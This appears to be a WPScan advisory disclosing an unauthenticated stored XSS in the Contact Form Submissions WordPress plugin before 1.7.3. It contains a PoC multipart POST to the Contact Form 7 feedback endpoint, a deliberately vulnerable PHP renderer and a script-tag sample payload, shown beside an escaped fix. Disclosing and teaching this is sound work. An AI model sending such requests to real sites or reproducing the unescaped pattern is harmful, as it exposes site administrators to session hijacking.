wpvulndb | Yoru Oni | WPVDB-ID: D02CF542-2D75-46BC-A0DF-67BBE501CC89
History: Feb 21, 2022 - 12:00 a.m.

Contact Form Submissions < 1.7.3 - Unauthenticated Stored XSS

Published: 2022-02-21 00:00:00 | Yoru Oni | wpscan.com

EPSS: 0.001 (Low) | Percentile: 31.6%

The plugin does not sanitise and escape additional fields in contact form requests before outputting them in the related submission. As a result, an unauthenticated attacker could perform Cross-Site Scripting attacks against admins viewing the malicious submission.

PoC

POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470
X-Requested-With: XMLHttpRequest
Content-Length: 726
Connection: close

-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-name"

Attacker
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-email"

[email protected]
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-subject"

XSS Injection
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-message"

Sorry, not sorry.
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name=""

Injected
-----------------------------243715402120191890871051639470--

The XSS will be triggered when an admin views the related submission.
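The pattern behind this advisory, as an added example in WordPress-style PHP rather than the plugin's own code: a submission viewer that escapes the declared form fields but echoes undeclared extra fields raw, next to a version that escapes every key and value. The esc_html fallback and the submission array are constructed here so the snippet runs outside WordPress.

```php
<?php
// Added example, not the plugin's code. Outside WordPress, fall back to
// htmlspecialchars so this runs stand-alone; inside WP, esc_html() exists.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Fields the form declares. Anything else in the POST body is an "additional field".
const DECLARED_FIELDS = ['your-name', 'your-email', 'your-subject', 'your-message'];

// Vulnerable pattern: declared fields are escaped, but extra fields are echoed raw.
function render_submission_vulnerable(array $submission): string {
    $html = '<table>';
    foreach ($submission as $name => $value) {
        if (in_array($name, DECLARED_FIELDS, true)) {
            $html .= '<tr><th>' . esc_html($name) . '</th><td>' . esc_html($value) . '</td></tr>';
        } else {
            // Attacker-controlled key and value reach the admin page unescaped.
            $html .= '<tr><th>' . $name . '</th><td>' . $value . '</td></tr>';
        }
    }
    return $html . '</table>';
}

// Hardened pattern: every key and value is escaped, declared or not; an empty
// field name (as in the PoC) gets a placeholder label instead of an empty cell.
function render_submission_safe(array $submission): string {
    $html = '<table>';
    foreach ($submission as $name => $value) {
        $label = ($name === '') ? '(unnamed field)' : (string) $name;
        $html .= '<tr><th>' . esc_html($label) . '</th><td>' . esc_html((string) $value) . '</td></tr>';
    }
    return $html . '</table>';
}

// Constructed submission shaped like the PoC: one undeclared, empty-named field.
$submission = [
    'your-name'    => 'Attacker',
    'your-subject' => 'XSS Injection',
    'your-message' => 'Sorry, not sorry.',
    ''             => '<script>alert(1)</script>',
];

$safe = render_submission_safe($submission);
if (strpos($safe, '<script>') !== false) {
    throw new RuntimeException('escaping failed');
}
echo $safe, PHP_EOL; // the extra field is rendered as inert text
```

Running render_submission_vulnerable() on the same array shows the raw tag in the output, which is the admin-side sink this advisory describes.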

CPE Name                   Operator   Version
contact-form-submissions   lt         1.7.3

